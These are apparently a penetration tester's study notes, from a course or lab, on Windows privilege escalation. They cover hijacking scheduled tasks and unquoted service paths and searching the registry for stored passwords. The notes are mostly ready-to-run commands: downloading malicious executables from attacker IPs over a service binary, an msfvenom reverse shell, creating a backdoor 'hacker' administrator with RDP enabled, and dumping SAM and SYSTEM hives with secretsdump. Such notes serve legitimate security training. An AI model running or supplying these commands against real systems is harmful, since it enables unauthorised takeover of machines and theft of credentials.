x

Abusing Other Windows Components (Misc)

17.15.1 - Scheduled Tasks

Full control (F)
Inherit (I)
Modify (M)

https://bad-glitch.github.io/posts/privilege-escalation/tasks/scheduled-tasks/

View scheduled tasks 

schtasks /query /fo LIST /v

We can check an interesting task running in the sub directory of a specific user for example 

icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe

We'll download our malicious exe to the target as well as backing up the existing task so we can restore it later. 

iwr -Uri http://192.168.48.3/adduser.exe -Outfile BackendCacheCleanup.exe

move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak

move .\BackendCacheCleanup.exe .\Pictures\

We should see our user added, once the scheduled task is executed again 

net user

net localgroup administrators

17.15.2 - Registry keys

Check for credentials including plaintext or weakly-encrypted credentials.

Recursively search for any registry key containing "password" as a key name and of type REG_SZ. Try removing /K to stop searching only in the key names and not in values or data. 

REG QUERY HKLM /F "password" /t REG_SZ /S /K

REG QUERY HKCU /F "password" /t REG_SZ /S /K

Windows supports automatic logon, if enabled, user credentials (especially DefaultPassword) can be stored in plaintext here. 

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

SNMP community strings 

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Stored PuTTY sessions can contain cleartext proxy creds and host IP/Usernames in the registry. 

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Old versions of WinVNC and RealVNC store reversible password hashes (e.g. XOR-obfuscated) 

reg query "HKCU\Software\ORL\WinVNC3\Password" 

reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

Read the SECURITY hive cache 

reg query "HKLM\SECURITY\Cache"

You may need to load the SECURITY hive first if you're analysing the hive offline. 

reg load HKLM\TempHive C:\Windows\System32\config\SECURITY

reg query HKLM\TempHive\Cache

reg unload HKLM\TempHive

17.15.3 - Using Exploits

Check privileges for anything special we could take advantage of 

whoami /priv

Enumerate the Windows version as well as any installed security patches, we can check for vulnerabilities against the versions 

systeminfo

Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }

17.15.4 - Leveraging Unquoted Service Paths

Another interesting attack vector that can lead to privilege escalation on Windows operating systems revolves around unquoted service paths.1 We can use this attack when we have write permissions to a service's main directory and subdirectories but cannot replace files within them. Please note that this section of the module will not be reproducible on your dedicated client. However, you will be able to use this technique on various hosts inside the lab environment.

Each Windows service maps to an executable file that will be run when the service is started. Most of the time, services that accompany third party software are stored under the C:\Program Files directory, which contains a space character in its name. This can potentially be turned into an opportunity for a privilege escalation attack.

cmd.exe 

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v """

As an example, here ZenHelpDesk has an unquoted service path

check our permission and check which part of the path you have write access to. 

dir /Q
dir /Q /S

Next we want to create a msfvenom file for a reverse shell and upload it to the folder where we have privledges over a file to write to. Start your netcat listner and check to see if you have shutdown privledges 

sc stop "Some vulnerable service" 

sc start "Some vulnerable service"

If sc start fails, try this. Check the privileges above "SERVICE_START_NAME" 

sc qc "Some vulnerable service"

If above fails check for shutdown privileges and attempt a restart 

whoami /priv 

shutdown /r /t 0

17.15.5 - PowerShell Service Privesc

https://juggernaut-sec.com/unquoted-service-paths/#:~:text=Enumerating%20Unquoted%20Service%20Paths%20by%20Downloading%20and%20Executing,bottom%20of%20the%20script%3A%20echo%20%27Invoke-AllChecks%27%20%3E%3E%20PowerUp.ps1 

cp /opt/PowerUp/PowerUp.ps1 .

Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName

move "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe" "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe.bak"

Invoke-exampleRequest -Uri "http://192.168.119.140:8000/shell.exe" -OutFile "C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe"

get-service *exac*
stop-service ESMexampleService*
start-service ESMexampleService*

17.3.6 - Add a high-privilege user

net user hacker password /add

net localgroup Admins hacker /add

net localgroup "Remote Desktop Users" hacker /add

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

net users

Attempt to dump users 

impacket-secretsdump hacker:password@<IP of victim machine> -outputfile hashes

Or xfreerdp3 

rdekstop -u hacker -p password <IP of victim machine>

Alternatively, retrieve the SAM and SYSTEM for use with SecretsDump. This method is useful if you have SeBackupPrivilege 

reg save HKLM\SAM C:\Windows\Temp\SAM

reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM

17.15.7 - Third party applications

Check PuTTY session configuration files 

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Left-click: follow link, Right-click: select node, Scroll: zoom
x